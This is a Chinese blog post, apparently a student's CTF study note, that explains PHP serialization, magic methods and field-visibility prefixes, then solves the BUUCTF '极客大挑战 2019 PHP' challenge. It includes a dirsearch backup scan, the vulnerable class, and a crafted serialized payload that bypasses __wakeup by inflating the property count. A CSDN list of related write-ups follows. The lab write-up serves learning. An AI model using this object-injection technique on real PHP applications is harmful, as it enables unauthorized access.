Day10反序列化

最新推荐文章于 2023-07-17 09:17:37 发布
最新推荐文章于 2023-07-17 09:17:37 发布
阅读量196 收藏
点赞数
分类专栏: 学习随笔
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45808659/article/details/109039100
版权

为了校赛要紧急突击下反序列化了,否则就不是我打CTF了,就成CTF打我了

定义

序列化是将对象转换为字符串以便存储和传输的一种方式。而反序列化就是序列化的逆过程,它会将字符串重新转换为对象供程序使用。简单的说,序列化就是对象–>字符串,反序列化就是字符串–>对象

函数

序列化和反序列化对应的分别是serialize()函数和unserialize()函数,反序列化本身并不危险,如果传参时反序列化的函数是用户可控的就会造成反序列化漏洞

组成

一般经过反序列化后的内容为:

O:4:“user”:2:{s:3:“age”;i:18;s:4:“name”;s:3:“Leo”;}
O:对象
4:user名称长度
2:两个变量
s:字符串
i:整型

魔术方法

PHP的magic方法以__开头,这些函数在某些情况下会自动调用,如果绕过了这些魔术方法,就造成了反序列化漏洞

__construct()         当一个对象创建时触发

 __destruct()          当一个对象被销毁时触发

 __toString()          把类当作字符串使用时触发

 __call()              在对象上下文中调用不可访问的方法时触发

 __callStatic()        在静态上下文中调用不可访问的方法时触发

 __get()               用于从不可访问的属性读取数据时

 __set()               用于将数据写入不可访问的属性

 __wakeup()            使用unserialize时触发

 __sleep()             使用serialize时触发

 __isset()             在不可访问的属性上调用isset()或empty()触发

 __unset()             在不可访问的属性上使用unset()时触发

 __invoke()            当脚本尝试将对象调用为函数时触发

 __autoload()          尝试加载未定义的类时触发

 __clone()             当对象复制完成时触发

了解每个函数是什么时候运行的才能更好的利用

<?php
 class A{
   public $test = "This is just a test";
   public function PrintTest()
   {
   echo $this->test.'<br/>';
   }
   public function __construct()
   {
   echo '__construct</br>';
   }
   public function __destruct()
   {
   echo '__destruct<br />';
   }
   public function __toString()
   {
   return '__toString<br />';
   }
 }

   $object = new A();
   $object->PrintTest();
   echo $object;
 ?>

运行结果:
在这里插入图片描述
刷题时正好遇到了一道反序列化的题目,然后…我当然是做不出来了(菜哭)

[极客大挑战 2019]PHP

图片: https://uploader.shimo.im/f/kBDEoyglIjon52Uk.png

根据提示,使用dirsearch扫描备份文件

python3 dirsearch.py -u "http://e4b57e61-b745-42aa-9c8b-6ab277e0cf5b.node3.buuoj.cn/" -e *

图片: https://uploader.shimo.im/f/6u1pIZ5mre4gVmDX.png

发现里面的文件
图片: https://uploader.shimo.im/f/7Bm6xayi73AguVv1.png

图片: https://uploader.shimo.im/f/QsslotfAgmR4JjY5.png

反序列化题目,先打开class.php文件

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

需要将password赋值为100,username赋值为admin

知识点

protected

protected声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上\0\0的前缀。这里的\0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0 组合。这也许解释了,为什么如果直接在网址上,传递\0\0username会报错,因为实际上并不是\0,只是用它来代替ASCII值为0的字符。必须用python传值才可以。
但是因为php7.1+对类属性的检测不严格,可以直接用public来进行序列化

<?php
class Name{
	protected $username = 'nonono';
	protected $password = 'yesyes';
 
	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}
 
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//运行会输出 O:4:"Name":2:{s:11:" * username";s:5:"admin";s:11:" * password";i:100;}
?>

O:4:"Name":2:{s:11:"*username";s:5:"admin";s:11:"*password";i:100;}
private

private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度。其中\0 字符也是计算长度的。

<?php
class Name{
	private $username = 'nonono';
	private $password = 'yesyes';
 
	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}
 
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
?>

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
public
<?php
class Name{
	public $username = 'nonono';
	public $password = 'yesyes';
 
	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}
 
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>

O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}

这里使用_wakeup函数进行绕过

作用:与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。绕过:当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过__wakeup 函数的执行

exp脚本:

<?php
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
$b = serialize($a);
echo $b; 
?>

图片: https://uploader.shimo.im/f/jXl6eMajvh96Q7xX.png

因为是private修饰的,所以需要用%00替代空格

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

把2改成3就可以绕过_wakeup函数,知识点为:
当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。
即可得到flag

参考链接:
https://blog.csdn.net/wanzt123/article/details/78430626?
https://www.bilibili.com/video/BV1oE411j7aF
https://blog.csdn.net/weixin_43900387/article/details/104403154

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反序列化漏洞详解
目标检测专栏持续更新中,改进YOLO系列通用,适用v5、v7、v8、所有博客均是团队原创博客,所有文章禁止转载,违者必究。
07-31 544
序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换为对象供程序使用。在PHP中序列化和反序列化对应的函数分别为serialize()和unserialize()。当程序在进行反序列化时,会自动调用一些函数,例如__wakeup(),__destruct()等函数,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。魔术方法是PHP面向对象中特有的特性。...
BUU CODE REVIEW 11反序列化
weixin_50339832的博客
09-09 603
反序列化漏洞 进入靶机是这个样子 首先进行分析后 看最后一行那个函数unserialize,判断反序列化 然后用post方法传obj变量,利用反序列化漏洞 这里要进行一个判断,就是buu类中的correct和input内容强相等,这里利用传引用的方法 到http://c.runoob.com/compile/1运行下列代码 <?php class BUU { public $correct=""; public $input=""; } $obj = new BUU...
BUU-0CTFpiapiapia(反序列化字符串逃逸)
unexpectedthing的博客
11-14 2917
前言 考点是反序列化字符串逃逸 wp 首先这个题,一进来就是一个登录平台,就属于一种基本的web网站的搭建,先登录再去后台,一般来说,可以sql注入之类的,但是我们习惯先看F12的源码,然后用御剑和dirsearch工具去扫描后台或者文件的泄露。 发现存在备份文件泄露,www.zip,得到源码 开始代码审计 config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: index.php <?php require_once('class.php'
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化
weixin_44632787的博客
06-25 742
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化 题目 Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and
BUUCTF--ReadlezPHP(反序列化简单应用)()
cainiao17441898的博客
08-15 253
目录扫描之后发现没有文件泄露。 查看一下源码发现了两个链接。 源码: PHP魔术方法:magic 这里eval没有用了不知道为啥(可能被过滤了吧)。 这里用了assert截断函数(作用跟eval差不多,eval里面的语句要以;结尾) 这里用蚁剑连接会连不上,就先查看一下phpinfo的信息。 生成payload: <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function
Json解析反序列化Demo
03-01
本文将深入讲解JSON解析和反序列化的概念,并通过一个具体的"GetWeatherDemo"示例来演示如何在实际应用中操作JSON数据。 ### JSON解析 **JSON解析**是指将JSON格式的字符串转换为编程语言中的数据结构,例如对象或...
利用PHAR协议进行PHP反序列化攻击1
08-03
之后,可以通过编写测试代码,触发反序列化过程,验证对象是否成功被反序列化并执行相关操作。 **CTF挑战应用**: 在某些网络安全竞赛(如[CISCN2019华北赛区 Day1 Web1]Dropbox)中,攻击者可能利用PHAR反序列化...
【技术分享】WebLogic T3协议反序列化 0day 漏洞分析 .pdf
09-05
【技术分享】WebLogic T3协议反序列化 0day 漏洞分析 安全运营 大数据 解决方案 安全防护 金融安全
day21_缓冲流、转换流、序列化流、Commons IO.pdf
11-02
`ObjectOutputStream` 和 `ObjectInputStream` 分别用于序列化和反序列化对象。通过这两个类,我们可以将对象的状态保存到文件,或者从文件中恢复对象的状态。 5. **Commons IO库** Apache Commons IO是Apache...
Yii 框架反序列化 RCE 利用链 2(官方无补丁)1
08-03
在描述中提到的漏洞涉及到反序列化 Remote Code Execution (RCE),这是一个严重安全问题,允许攻击者通过反序列化过程执行任意代码。在这个特定的利用链中,攻击者可以通过精心构造的输入来触发一系列的类方法调用,...
[极客大挑战 2019]PHP(反序列化
最新发布
mafucan的博客
07-17 949
输出结果中Name和username,Name和password之间是有不可见字符的,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。输出结果中Name和username,Name和password之间是有不可见字符的,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。这表示序列化的对象类型,其中 4 表示类名 “Name” 的长度,“Name” 是类名本身,2 表示该对象有两个属性。
PHP序列化反序列化漏洞总结(一篇懂)
qq_45521281的博客
05-03 7776
文章目录序列化和反序列化的概念与基础知识PHP的序列化访问控制修饰符PHP的反序列化PHP反序列化漏洞(常规)__wakeup()__destruct()示例一:示例二(连菜刀、反序列化免杀后门):__toString()Error类ExceptionPHP中Session反序列化(重点)简介与基础知识Session序列化漏洞利用PHP Session中的序列化危害实际利用CTF例题 序列化和反...
反序列化之魔术方法的浅学习
quan9i的博客
05-13 2483
前言 学习反序列化,那么就需要首先掌握魔术方法的使用,本篇文章将尽可能详细的讲解反序列化的魔术方法,博主只是小白,如有问题还请各位师傅多多指点! 魔术方法 常见魔术方法有以下几种 __construct: 在创建对象时候初始化对象,一般用于对变量赋初值。 __destruct: 和构造函数相反,当对象所在函数调用完毕后执行。 __call:当调用对象中不存在的方法会自动调用该方法。 __get():获取对象不存在的属性时执行此函数。 __set():设置对象不存在的属性时执行此函数。 __toString
序列化与反序列化漏洞详解
m0_55854679的博客
03-13 9145
文章目录小知识漏洞原理序列化反序列化函数解析序列化:serialize()函数反序列化 :unserialize()函数魔术方法pikachu靶场练习1靶场练习2总结 小知识 weblogic反序列化漏洞 该漏洞挖掘较难。 与变量覆盖一样,并不是说具体的漏洞,而是与它的具体代码有关。 === 【比较 数值相等、类型相等】 == 【比较,数值相等】 = 【赋值 赋予数值】 => 【键值分离】 -> 【类里面的方法调用或者传参】 漏洞原理 序列化: 游戏的
【BUUCTF】basic web BUU CODE REVIEW 1 1(反序列化漏洞,传引用判断相等)
weixin_45844670的博客
10-12 3322
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->corre
buu刷题记录
missht0的博客
01-18 808
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')
【BUUCTF】[极客大挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 1972
【BUUCTF】[极客大挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6310
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
CTFSHOW 反序列化
热门推荐
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
ctf php反序列化
06-07
CTF中的PHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,攻击者通常会在Cookie、GET或POST参数中注入恶意的序列化数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用反序列化功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值